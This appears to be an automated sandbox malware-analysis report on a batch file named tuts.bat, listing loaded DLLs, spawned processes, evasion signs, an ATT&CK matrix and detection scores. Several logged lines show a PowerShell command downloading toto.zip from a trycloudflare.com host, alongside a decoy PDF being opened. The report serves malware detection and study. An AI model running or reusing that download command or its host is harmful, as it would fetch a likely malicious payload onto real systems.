    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089f\ source: powershell.exe, 0000000F.00000002.1932073106.00000210360C2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036086000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036093000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036086000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036093000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb*i source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb}\89A*i source: powershell.exe, 0000000F.00000002.1932073106.00000210360B4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb4 source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: powershell.exe, 0000000F.00000002.1933167475.0000021036240000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll) source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1933167475.0000021036240000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1932073106.0000021036043000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: tuts.bat, type: SAMPLE
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2941Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 897Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 6880Thread sleep count: 38 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep count: 2941 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 897 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fiNdJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\tuts.bat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    1
    Scripting
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546598 Sample: tuts.bat Startdate: 01/11/2024 Architecture: WINDOWS Score: 64 24 terrorists-cultures-wallpaper-tabs.trycloudflare.com 2->24 26 x1.i.lencr.org 2->26 28 Multi AV Scanner detection for domain / URL 2->28 30 Yara detected Abobus Obfuscator 2->30 32 AI detected suspicious sample 2->32 9 cmd.exe 3 4 2->9         started        signatures3 process4 signatures5 34 Suspicious powershell command line found 9->34 12 Acrobat.exe 76 9->12         started        14 powershell.exe 14 15 9->14         started        16 conhost.exe 9->16         started        18 10 other processes 9->18 process6 process7 20 AcroCEF.exe 106 12->20         started        process8 22 AcroCEF.exe 4 20->22         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    tuts.bat5%ReversingLabs
    tuts.bat7%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    terrorists-cultures-wallpaper-tabs.trycloudflare.com6%VirustotalBrowse
    x1.i.lencr.org0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
